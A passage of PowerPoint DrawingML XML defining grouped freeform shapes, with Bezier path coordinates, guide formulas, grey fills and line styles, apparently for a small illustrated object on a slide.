                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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314" name="Group 495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854" y="2913"/>
                    <a:ext cx="1087" cy="346"/>
                    <a:chOff x="-181" y="3580"/>
                    <a:chExt cx="2284" cy="730"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="315" name="Freeform 49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714" y="3819"/>
                      <a:ext cx="1389" cy="491"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 582 w 588"/>
                        <a:gd name="T1" fmla="*/ 4 h 208"/>
                        <a:gd name="T2" fmla="*/ 568 w 588"/>
                        <a:gd name="T3" fmla="*/ 1 h 208"/>
                        <a:gd name="T4" fmla="*/ 558 w 588"/>
                        <a:gd name="T5" fmla="*/ 3 h 208"/>
                        <a:gd name="T6" fmla="*/ 37 w 588"/>
                        <a:gd name="T7" fmla="*/ 143 h 208"/>
                        <a:gd name="T8" fmla="*/ 27 w 588"/>
                        <a:gd name="T9" fmla="*/ 146 h 208"/>
                        <a:gd name="T10" fmla="*/ 9 w 588"/>
                        <a:gd name="T11" fmla="*/ 161 h 208"/>
                        <a:gd name="T12" fmla="*/ 0 w 588"/>
                        <a:gd name="T13" fmla="*/ 179 h 208"/>
                        <a:gd name="T14" fmla="*/ 0 w 588"/>
                        <a:gd name="T15" fmla="*/ 194 h 208"/>
                        <a:gd name="T16" fmla="*/ 7 w 588"/>
                        <a:gd name="T17" fmla="*/ 204 h 208"/>
                        <a:gd name="T18" fmla="*/ 19 w 588"/>
                        <a:gd name="T19" fmla="*/ 208 h 208"/>
                        <a:gd name="T20" fmla="*/ 31 w 588"/>
                        <a:gd name="T21" fmla="*/ 204 h 208"/>
                        <a:gd name="T22" fmla="*/ 550 w 588"/>
                        <a:gd name="T23" fmla="*/ 65 h 208"/>
                        <a:gd name="T24" fmla="*/ 562 w 588"/>
                        <a:gd name="T25" fmla="*/ 62 h 208"/>
                        <a:gd name="T26" fmla="*/ 579 w 588"/>
                        <a:gd name="T27" fmla="*/ 48 h 208"/>
                        <a:gd name="T28" fmla="*/ 588 w 588"/>
                        <a:gd name="T29" fmla="*/ 30 h 208"/>
                        <a:gd name="T30" fmla="*/ 588 w 588"/>
                        <a:gd name="T31" fmla="*/ 14 h 208"/>
                        <a:gd name="T32" fmla="*/ 582 w 588"/>
                        <a:gd name="T33" fmla="*/ 4 h 20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88" h="208">
                          <a:moveTo>
                            <a:pt x="582" y="4"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="578" y="1"/>
                            <a:pt x="573" y="0"/>
                            <a:pt x="568" y="1"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="558" y="3"/>
                            <a:pt x="558" y="3"/>
                            <a:pt x="558" y="3"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="37" y="143"/>
                            <a:pt x="37" y="143"/>
                            <a:pt x="37" y="143"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="27" y="146"/>
                            <a:pt x="27" y="146"/>
                            <a:pt x="27" y="146"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="21" y="149"/>
                            <a:pt x="14" y="154"/>
                            <a:pt x="9" y="161"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="4" y="167"/>
                            <a:pt x="2" y="173"/>
                            <a:pt x="0" y="179"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="194"/>
                            <a:pt x="0" y="194"/>
                            <a:pt x="0" y="194"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="198"/>
                            <a:pt x="3" y="202"/>
                            <a:pt x="7" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="10" y="207"/>
                            <a:pt x="15" y="208"/>
                            <a:pt x="19" y="208"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="31" y="204"/>
                            <a:pt x="31" y="204"/>
                            <a:pt x="31" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="550" y="65"/>
                            <a:pt x="550" y="65"/>
                            <a:pt x="550" y="65"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="562" y="62"/>
                            <a:pt x="562" y="62"/>
                            <a:pt x="562" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="568" y="59"/>
                            <a:pt x="574" y="54"/>
                            <a:pt x="579" y="48"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="584" y="42"/>
                            <a:pt x="587" y="36"/>
                            <a:pt x="588" y="30"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="588" y="14"/>
                            <a:pt x="588" y="14"/>
                            <a:pt x="588" y="14"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="587" y="10"/>
                            <a:pt x="585" y="7"/>
                            <a:pt x="582" y="4"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="80808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6350" cap="flat" cmpd="sng">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:miter lim="800000"/>
                          <a:headEnd type="none" w="med" len="med"/>
                          <a:tailEnd type="none" w="med" len="med"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6" name="Freeform 497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714" y="4156"/>
                      <a:ext cx="144" cy="154"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 48 w 61"/>
                        <a:gd name="T1" fmla="*/ 47 h 65"/>
                        <a:gd name="T2" fmla="*/ 50 w 61"/>
                        <a:gd name="T3" fmla="*/ 4 h 65"/>
                        <a:gd name="T4" fmla="*/ 37 w 61"/>
                        <a:gd name="T5" fmla="*/ 0 h 65"/>
                        <a:gd name="T6" fmla="*/ 27 w 61"/>
                        <a:gd name="T7" fmla="*/ 3 h 65"/>
                        <a:gd name="T8" fmla="*/ 9 w 61"/>
                        <a:gd name="T9" fmla="*/ 18 h 65"/>
                        <a:gd name="T10" fmla="*/ 0 w 61"/>
                        <a:gd name="T11" fmla="*/ 36 h 65"/>
                        <a:gd name="T12" fmla="*/ 0 w 61"/>
                        <a:gd name="T13" fmla="*/ 51 h 65"/>
                        <a:gd name="T14" fmla="*/ 7 w 61"/>
                        <a:gd name="T15" fmla="*/ 61 h 65"/>
                        <a:gd name="T16" fmla="*/ 19 w 61"/>
                        <a:gd name="T17" fmla="*/ 65 h 65"/>
                        <a:gd name="T18" fmla="*/ 31 w 61"/>
                        <a:gd name="T19" fmla="*/ 61 h 65"/>
                        <a:gd name="T20" fmla="*/ 48 w 61"/>
                        <a:gd name="T21" fmla="*/ 47 h 6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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="61" h="65">
                          <a:moveTo>
                            <a:pt x="48" y="47"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="60" y="31"/>
                            <a:pt x="61" y="12"/>
                            <a:pt x="50" y="4"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="47" y="1"/>
                            <a:pt x="42" y="0"/>
                            <a:pt x="37" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="27" y="3"/>
                            <a:pt x="27" y="3"/>
                            <a:pt x="27" y="3"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="21" y="6"/>
                            <a:pt x="14" y="11"/>
                            <a:pt x="9" y="18"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="4" y="24"/>
                            <a:pt x="2" y="30"/>
                            <a:pt x="0" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="51"/>
                            <a:pt x="0" y="51"/>
                            <a:pt x="0" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="55"/>
                            <a:pt x="3" y="59"/>
                            <a:pt x="7" y="61"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="10" y="64"/>
                            <a:pt x="15" y="65"/>
                            <a:pt x="19" y="65"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="31" y="61"/>
                            <a:pt x="31" y="61"/>
                            <a:pt x="31" y="61"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="37" y="58"/>
                            <a:pt x="43" y="54"/>
                            <a:pt x="48" y="47"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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7" name="Freeform 49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959" y="3819"/>
                      <a:ext cx="144" cy="153"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 13 w 61"/>
                        <a:gd name="T1" fmla="*/ 18 h 65"/>
                        <a:gd name="T2" fmla="*/ 11 w 61"/>
                        <a:gd name="T3" fmla="*/ 62 h 65"/>
                        <a:gd name="T4" fmla="*/ 23 w 61"/>
                        <a:gd name="T5" fmla="*/ 65 h 65"/>
                        <a:gd name="T6" fmla="*/ 35 w 61"/>
                        <a:gd name="T7" fmla="*/ 62 h 65"/>
                        <a:gd name="T8" fmla="*/ 52 w 61"/>
                        <a:gd name="T9" fmla="*/ 48 h 65"/>
                        <a:gd name="T10" fmla="*/ 61 w 61"/>
                        <a:gd name="T11" fmla="*/ 30 h 65"/>
                        <a:gd name="T12" fmla="*/ 61 w 61"/>
                        <a:gd name="T13" fmla="*/ 14 h 65"/>
                        <a:gd name="T14" fmla="*/ 55 w 61"/>
                        <a:gd name="T15" fmla="*/ 4 h 65"/>
                        <a:gd name="T16" fmla="*/ 41 w 61"/>
                        <a:gd name="T17" fmla="*/ 1 h 65"/>
                        <a:gd name="T18" fmla="*/ 31 w 61"/>
                        <a:gd name="T19" fmla="*/ 3 h 65"/>
                        <a:gd name="T20" fmla="*/ 13 w 61"/>
                        <a:gd name="T21" fmla="*/ 18 h 6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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="61" h="65">
                          <a:moveTo>
                            <a:pt x="13" y="18"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="34"/>
                            <a:pt x="0" y="53"/>
                            <a:pt x="11" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="15" y="64"/>
                            <a:pt x="19" y="65"/>
                            <a:pt x="23" y="65"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="35" y="62"/>
                            <a:pt x="35" y="62"/>
                            <a:pt x="35" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="41" y="59"/>
                            <a:pt x="47" y="54"/>
                            <a:pt x="52" y="48"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="57" y="42"/>
                            <a:pt x="60" y="36"/>
                            <a:pt x="61" y="30"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="61" y="14"/>
                            <a:pt x="61" y="14"/>
                            <a:pt x="61" y="14"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="60" y="10"/>
                            <a:pt x="58" y="7"/>
                            <a:pt x="55" y="4"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="51" y="1"/>
                            <a:pt x="46" y="0"/>
                            <a:pt x="41" y="1"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="31" y="3"/>
                            <a:pt x="31" y="3"/>
                            <a:pt x="31" y="3"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="25" y="6"/>
                            <a:pt x="19" y="11"/>
                            <a:pt x="13" y="18"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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8" name="Freeform 499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406" y="3958"/>
                      <a:ext cx="154" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 11 w 65"/>
                        <a:gd name="T1" fmla="*/ 65 h 73"/>
                        <a:gd name="T2" fmla="*/ 52 w 65"/>
                        <a:gd name="T3" fmla="*/ 51 h 73"/>
                        <a:gd name="T4" fmla="*/ 55 w 65"/>
                        <a:gd name="T5" fmla="*/ 8 h 73"/>
                        <a:gd name="T6" fmla="*/ 13 w 65"/>
                        <a:gd name="T7" fmla="*/ 22 h 73"/>
                        <a:gd name="T8" fmla="*/ 11 w 65"/>
                        <a:gd name="T9" fmla="*/ 65 h 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5" h="73">
                          <a:moveTo>
                            <a:pt x="11" y="65"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="22" y="73"/>
                            <a:pt x="40" y="67"/>
                            <a:pt x="52" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="64" y="36"/>
                            <a:pt x="65" y="16"/>
                            <a:pt x="55" y="8"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="44" y="0"/>
                            <a:pt x="25" y="6"/>
                            <a:pt x="13" y="22"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="38"/>
                            <a:pt x="0" y="57"/>
                            <a:pt x="11" y="65"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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9" name="Freeform 50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-118" y="3580"/>
                      <a:ext cx="2174" cy="584"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 2174"/>
                        <a:gd name="T1" fmla="*/ 343 h 584"/>
                        <a:gd name="T2" fmla="*/ 1278 w 2174"/>
                        <a:gd name="T3" fmla="*/ 0 h 584"/>
                        <a:gd name="T4" fmla="*/ 2174 w 2174"/>
                        <a:gd name="T5" fmla="*/ 241 h 584"/>
                        <a:gd name="T6" fmla="*/ 896 w 2174"/>
                        <a:gd name="T7" fmla="*/ 584 h 584"/>
                        <a:gd name="T8" fmla="*/ 0 w 2174"/>
                        <a:gd name="T9" fmla="*/ 343 h 58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174" h="584">
                          <a:moveTo>
                            <a:pt x="0" y="343"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1278" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2174" y="241"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="896" y="584"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="343"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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0" name="Freeform 501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-181" y="3923"/>
                      <a:ext cx="959" cy="380"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 27 w 406"/>
                        <a:gd name="T1" fmla="*/ 0 h 161"/>
                        <a:gd name="T2" fmla="*/ 27 w 406"/>
                        <a:gd name="T3" fmla="*/ 0 h 161"/>
                        <a:gd name="T4" fmla="*/ 9 w 406"/>
                        <a:gd name="T5" fmla="*/ 15 h 161"/>
                        <a:gd name="T6" fmla="*/ 0 w 406"/>
                        <a:gd name="T7" fmla="*/ 34 h 161"/>
                        <a:gd name="T8" fmla="*/ 0 w 406"/>
                        <a:gd name="T9" fmla="*/ 48 h 161"/>
                        <a:gd name="T10" fmla="*/ 7 w 406"/>
                        <a:gd name="T11" fmla="*/ 58 h 161"/>
                        <a:gd name="T12" fmla="*/ 19 w 406"/>
                        <a:gd name="T13" fmla="*/ 62 h 161"/>
                        <a:gd name="T14" fmla="*/ 387 w 406"/>
                        <a:gd name="T15" fmla="*/ 161 h 161"/>
                        <a:gd name="T16" fmla="*/ 386 w 406"/>
                        <a:gd name="T17" fmla="*/ 160 h 161"/>
                        <a:gd name="T18" fmla="*/ 379 w 406"/>
                        <a:gd name="T19" fmla="*/ 150 h 161"/>
                        <a:gd name="T20" fmla="*/ 379 w 406"/>
                        <a:gd name="T21" fmla="*/ 135 h 161"/>
                        <a:gd name="T22" fmla="*/ 388 w 406"/>
                        <a:gd name="T23" fmla="*/ 117 h 161"/>
                        <a:gd name="T24" fmla="*/ 406 w 406"/>
                        <a:gd name="T25" fmla="*/ 102 h 161"/>
                        <a:gd name="T26" fmla="*/ 27 w 406"/>
                        <a:gd name="T27" fmla="*/ 0 h 16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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="406" h="161">
                          <a:moveTo>
                            <a:pt x="27" y="0"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="27" y="0"/>
                            <a:pt x="27" y="0"/>
                            <a:pt x="27" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="20" y="3"/>
                            <a:pt x="14" y="8"/>
                            <a:pt x="9" y="15"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="4" y="21"/>
                            <a:pt x="1" y="27"/>
                            <a:pt x="0" y="34"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="48"/>
                            <a:pt x="0" y="48"/>
                            <a:pt x="0" y="48"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="52"/>
                            <a:pt x="3" y="56"/>
                            <a:pt x="7" y="58"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="10" y="61"/>
                            <a:pt x="14" y="62"/>
                            <a:pt x="19" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="387" y="161"/>
                            <a:pt x="387" y="161"/>
                            <a:pt x="387" y="161"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="386" y="160"/>
                            <a:pt x="386" y="160"/>
                            <a:pt x="386" y="160"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="382" y="158"/>
                            <a:pt x="380" y="154"/>
                            <a:pt x="379" y="150"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="379" y="135"/>
                            <a:pt x="379" y="135"/>
                            <a:pt x="379" y="135"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="381" y="129"/>
                            <a:pt x="383" y="123"/>
                            <a:pt x="388" y="117"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="393" y="110"/>
                            <a:pt x="400" y="105"/>
                            <a:pt x="406" y="102"/>
                          </a:cubicBezTo>
                          <a:lnTo>
                            <a:pt x="27" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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1" name="Freeform 50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733" y="3693"/>
                      <a:ext cx="897" cy="241"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 897 w 897"/>
                        <a:gd name="T1" fmla="*/ 241 h 241"/>
                        <a:gd name="T2" fmla="*/ 0 w 897"/>
                        <a:gd name="T3" fmla="*/ 0 h 241"/>
                        <a:gd name="T4" fmla="*/ 897 w 897"/>
                        <a:gd name="T5" fmla="*/ 241 h 24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897" h="241">
                          <a:moveTo>
                            <a:pt x="897" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="897" y="24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2" name="Line 503"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="733" y="3693"/>
                      <a:ext cx="897" cy="241"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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3" name="Freeform 50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520" y="3753"/>
                      <a:ext cx="896" cy="238"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 896 w 896"/>
                        <a:gd name="T1" fmla="*/ 238 h 238"/>
                        <a:gd name="T2" fmla="*/ 0 w 896"/>
                        <a:gd name="T3" fmla="*/ 0 h 238"/>
                        <a:gd name="T4" fmla="*/ 896 w 896"/>
                        <a:gd name="T5" fmla="*/ 238 h 23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896" h="238">
                          <a:moveTo>
                            <a:pt x="896" y="238"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="896" y="23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4" name="Line 505"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="520" y="3753"/>
                      <a:ext cx="896" cy="238"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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5" name="Freeform 50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308" y="3809"/>
                      <a:ext cx="895" cy="241"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 895 w 895"/>
                        <a:gd name="T1" fmla="*/ 241 h 241"/>
                        <a:gd name="T2" fmla="*/ 0 w 895"/>
                        <a:gd name="T3" fmla="*/ 0 h 241"/>
                        <a:gd name="T4" fmla="*/ 895 w 895"/>
                        <a:gd name="T5" fmla="*/ 241 h 24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895" h="241">
                          <a:moveTo>
                            <a:pt x="895" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="895" y="24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6" name="Line 507"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="308" y="3809"/>
                      <a:ext cx="895" cy="241"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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7" name="Freeform 50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945" y="3637"/>
                      <a:ext cx="898" cy="241"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 898 w 898"/>
                        <a:gd name="T1" fmla="*/ 241 h 241"/>
                        <a:gd name="T2" fmla="*/ 0 w 898"/>
                        <a:gd name="T3" fmla="*/ 0 h 241"/>
                        <a:gd name="T4" fmla="*/ 898 w 898"/>
                        <a:gd name="T5" fmla="*/ 241 h 24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898" h="241">
                          <a:moveTo>
                            <a:pt x="898" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="898" y="24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8" name="Line 509"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="945" y="3637"/>
                      <a:ext cx="898" cy="241"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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9" name="Freeform 51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95" y="3866"/>
                      <a:ext cx="895" cy="241"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 895 w 895"/>
                        <a:gd name="T1" fmla="*/ 241 h 241"/>
                        <a:gd name="T2" fmla="*/ 0 w 895"/>
                        <a:gd name="T3" fmla="*/ 0 h 241"/>
                        <a:gd name="T4" fmla="*/ 895 w 895"/>
                        <a:gd name="T5" fmla="*/ 241 h 24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895" h="241">
                          <a:moveTo>
                            <a:pt x="895" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="895" y="24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30" name="Line 511"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="95" y="3866"/>
                      <a:ext cx="895" cy="241"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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255" name="Group 512"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="416" y="1810"/>
                  <a:ext cx="867" cy="288"/>
                  <a:chOff x="3870" y="1964"/>
                  <a:chExt cx="1492" cy="495"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="300" name="Freeform 513"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4234" y="2060"/>
                    <a:ext cx="1128" cy="399"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 6684 w 6758"/>
                      <a:gd name="T1" fmla="*/ 46 h 2386"/>
                      <a:gd name="T2" fmla="*/ 6529 w 6758"/>
                      <a:gd name="T3" fmla="*/ 5 h 2386"/>
                      <a:gd name="T4" fmla="*/ 6416 w 6758"/>
                      <a:gd name="T5" fmla="*/ 36 h 2386"/>
                      <a:gd name="T6" fmla="*/ 422 w 6758"/>
                      <a:gd name="T7" fmla="*/ 1644 h 2386"/>
                      <a:gd name="T8" fmla="*/ 309 w 6758"/>
                      <a:gd name="T9" fmla="*/ 1675 h 2386"/>
                      <a:gd name="T10" fmla="*/ 102 w 6758"/>
                      <a:gd name="T11" fmla="*/ 1843 h 2386"/>
                      <a:gd name="T12" fmla="*/ 0 w 6758"/>
                      <a:gd name="T13" fmla="*/ 2061 h 2386"/>
                      <a:gd name="T14" fmla="*/ 0 w 6758"/>
                      <a:gd name="T15" fmla="*/ 2223 h 2386"/>
                      <a:gd name="T16" fmla="*/ 76 w 6758"/>
                      <a:gd name="T17" fmla="*/ 2343 h 2386"/>
                      <a:gd name="T18" fmla="*/ 219 w 6758"/>
                      <a:gd name="T19" fmla="*/ 2384 h 2386"/>
                      <a:gd name="T20" fmla="*/ 356 w 6758"/>
                      <a:gd name="T21" fmla="*/ 2347 h 2386"/>
                      <a:gd name="T22" fmla="*/ 6326 w 6758"/>
                      <a:gd name="T23" fmla="*/ 745 h 2386"/>
                      <a:gd name="T24" fmla="*/ 6463 w 6758"/>
                      <a:gd name="T25" fmla="*/ 709 h 2386"/>
                      <a:gd name="T26" fmla="*/ 6658 w 6758"/>
                      <a:gd name="T27" fmla="*/ 545 h 2386"/>
                      <a:gd name="T28" fmla="*/ 6758 w 6758"/>
                      <a:gd name="T29" fmla="*/ 340 h 2386"/>
                      <a:gd name="T30" fmla="*/ 6758 w 6758"/>
                      <a:gd name="T31" fmla="*/ 156 h 2386"/>
                      <a:gd name="T32" fmla="*/ 6684 w 6758"/>
                      <a:gd name="T33" fmla="*/ 46 h 23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6758" h="2386">
                        <a:moveTo>
                          <a:pt x="6684" y="46"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="6641" y="13"/>
                          <a:pt x="6587" y="0"/>
                          <a:pt x="6529" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6416" y="36"/>
                          <a:pt x="6416" y="36"/>
                          <a:pt x="6416" y="36"/>
